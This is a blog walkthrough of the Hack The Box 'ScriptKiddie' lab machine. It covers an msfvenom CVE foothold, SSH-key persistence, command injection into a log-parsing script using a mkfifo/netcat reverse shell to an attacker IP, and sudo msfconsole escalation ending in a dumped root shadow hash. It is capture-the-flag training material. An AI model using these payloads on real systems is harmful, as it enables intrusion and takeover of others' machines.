Jack Cyber-security graduate student interested in researching privacy and security issues.

Hack The Box - Script Kiddie [Easy Linux]

Hack The Box - Script Kiddie [Easy Linux]

ScriptKiddie

Overview

This easy Linux machine starts off with a CVE in MSF Venom sent to the server to gain a foothold. From here we notice a file scanlosers.sh with insecure logic that we could abuse to gain control of a second user on the box. Finally, as the pwn user we have sudo privileges to run MSF, which easily drops into a root shell.

../assets/images/ScriptKiddie/Untitled.png

  • Starting off with an nmap scan against all ports
  • ssh is open and a web server on port 5000 –> weird!

../assets/images/ScriptKiddie/Untitled%201.png

Going to this web server we can see that a “script kiddie” set up some tools that he could use. After trying multiple times to exploit the nmap and searchsploit inputs, I concluded that they were most likely not vulnerable and moved onto the payloads generator.

Initial Thoughts: possible command injection, malicious file upload

Searching Online

Offensive Security’s Exploit Database Archive

exploit.py

../assets/images/ScriptKiddie/Untitled%202.png

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIOuEDdcHsyiGAVYcSVdqt5t4ZfMVKlVG+C/g5KTNLGXGdPBieTAG/xRF2t8yHF62Q9om6PDAS5mgDzw1vnZZfZjUXowZQz8OVUoq3ZfklCDmobLuvhgMQP2ikLO+D9E1bjeneViNZ2rx4QU2YwV9FWd44b5wHhRDtfPwbYKlOY8ioO+0t57j3sMJldoE2p8NN17/TG5WjwPy0RyTAXSoi6Rt+Gs9ncux0aVFfIDwDeyPJnjpXs11isxOi57kCDUm6I6KdvL8xD6iMVR5Y0D9FMVe4qcNw8tzCIpCDqHoaGJRTjxz8yfHdFzzys2IwIA24a2vsiJU2axtavAM6g0mKvxhs/C6+n+SqwxwFXUDQAbLNHUXjhZXwkmkb6YGgfVlE4xKu47bj3FTWmabo0OLtwicf2WBjwPBxkzeyvvMwGmurbXA9SNTYRAYgyIQtkNpnrkn/ILR4wDMkWIfCD10TgKUsWTS8pqPdwtfCg9tVd32h6ykS20ivMEGq4UD/kX8= kali@kali" >> /home/kid/.ssh/authorized_keys

  • Get a bash shell through ssh by adding my public ssh key to the authorized_keys file

Enumeration

../assets/images/ScriptKiddie/Untitled%203.png

Seeing which users are on the box

../assets/images/ScriptKiddie/Untitled%204.png

  • This script parses the 3rd line in a log and passes it to a shell command… hmmmmm

.test

1
a a ; /bin/bash -c '[[ -e "/tmp/z" ]] && rm -f "/tmp/z";mkfifo /tmp/z;cat /tmp/z | /bin/sh -i 2>&1 | nc 10.10.14.136 4443 > /tmp/z' #

Note the # at the end of the command. This is important so any commands that follow will not execute or cause an error in our exploit.

1
2
3
#!/bin/bash
cat .test > /home/kid/logs/hackers
bash /home/pwn/scanlosers.sh

Above is a small bash script that will copy the contents of .test into /home/kid/logs/hackers and then immediately call scanlosers.sh

Getting the pwn user to fire the script

../assets/images/ScriptKiddie/Untitled%205.png

  • if you put command injection into the searchsploit input on the web app it will add your ip to /home/kid/logs/hackers

../assets/images/ScriptKiddie/Untitled%206.png

../assets/images/ScriptKiddie/Untitled%207.png

../assets/images/ScriptKiddie/Untitled%208.png

  • if you send a reverse shell in the third column and comment out the rest of the command, you can get a callback

../assets/images/ScriptKiddie/Untitled%209.png

Root priv-esc from pwn to root

../assets/images/ScriptKiddie/Untitled%2010.png

First thing I did is check if we have sudo capabilities as the user pwn… turns out we do and its for MSF console.

../assets/images/ScriptKiddie/Untitled%2011.png

../assets/images/ScriptKiddie/Untitled%2012.png

Since MSF console is just a shell (and we can run it as root) you can see that we have the full abilities of root.

Cat /etc/shadow

root:$6$RO4wVQ/hyXhjln4S$UQl5o6XSa2USqAM.RT9YwujFhZWriZqEz5We.opH1FLTbDtLfruET9jlKcEEqfxnCb1UxwhcfWJ/2gPJE77Bl.:18632:0:99999:7:::

Thoughts

Overall I thought this was a fun beginner box. It wasn’t too difficult yet demonstrated good skills like pivoting, cve’s and understanding sudo privileges.

Rating: